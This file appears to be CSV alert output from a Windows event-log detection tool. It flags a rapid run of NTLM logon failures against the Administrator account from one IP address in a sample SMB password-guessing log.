2016-09-20 01:52:01.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7fbzSHaZBDH4zFZZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.200 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NgIei0bMIcslJCVa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JPoKjwanczELBC5A : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.290 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QOYMVAnCWB2RFYAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.328 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k1S45GBtQ8Uoyilw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.378 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60oeDAnU41sz1wYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: enjlrrdf6lrm7Bao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 58WzO6wxh7QshZgS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7eZKzHgu5ADLYsWU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uOSK3xC1E5PpBVNM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.598 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vFXasYWGCHbQOWWI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XlYJ3oHYKYhg0KC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.691 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LxOKwi8Q4y2mHBDu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xwFKFySH4w2yWtPX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OlwGTGadOEMfUFiM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hZ9WuMoOtxGdwOQn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cCLK0gWvRoz0Ceao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZDrcOxtm2fHXK5pO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:01.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Pm2tPGetcAJkSuvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FBskiUSfF2ghuDcF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mZJal2nq3JAk6I2S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9ek0Sl1ikhIfIb6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.141 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eHrn5Tp9JtnAgCbE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.197 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k7tR8gp2piqqixqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SqSBRMoiFeWe4FAt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.297 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Nu4m1xKDU0OUkoR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gui98cdQHPgyNOZI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.407 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bm4U7TAfsPTEiygC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.457 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fDOoaVWVFAMLiA71 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.497 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qiJeLgInEkHffefo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yWyguWQP2iYUArhD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.595 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vDa3GqsTMMXguFhi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.645 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lr0lkAcdnji1zjW4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4WfNFd5MkQxaxHGP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.741 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j8hdPhtxP4Ds65yV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y2BBoWoXWXuRysTx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.884 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6GEhZ2BduHwjJj9H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GbwEHQCAUJd64LlA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:02.967 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wGfoObbN8ioefyce : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iLHhCgHvmOzoLLqG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.050 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v9KL69y47DMyFOWT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.098 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ECuVYiqdMw2dMjT6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.150 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YJCYumRekD7AREYQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0H4OxKzoemZrsosT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.238 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wSHnvxa0khWdWBVx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bJkPp0bghDCPYz52 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SfHRWGXjCej9HSPb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.383 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X42H7EvrvzsRqXWO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: moo42NdOq30Gnz3T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4NHVYxxDkCOsQw8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iPUiW0vFQB405kwS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OtcZ4ymkeLHeU7YJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.620 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZxZCDKWtqkGJ0dnw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f4GGnhttZgmRPRJo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.716 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gI0j9w45eXEFeex3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.764 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BVZ2YRDUAOsNgKxo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJfIpxlcwVf7pWga : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.858 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Oerixd9ODF6fslsC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sbJC5yvrIymYgaHY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.951 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4schZcUP8Im8Ee1e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:03.988 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WotargyGlEq9PBch : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.025 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2JSMrPoucOR0nzlD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.064 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jr4w4uoF2DVZ5n9x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v319oZIaOBpuf542 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.151 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GNRTL9BLlGWMx6dA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zHlDIOZ9B5uY8Rzz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dr2bvAue8mr5kagX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.284 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pXBds9GoXr6IZUfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLYuegjXO18lo342 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.367 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: To3MMEEvNXKNjKHT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.416 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N0HCToTmh3ESGBYt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.455 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nNvBueVo3ANNmSSN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mVWOoAG5ermGL2Gl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W7QYJUNPm5b4jprh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:04.590 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PHllwNJvpH3P97cp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
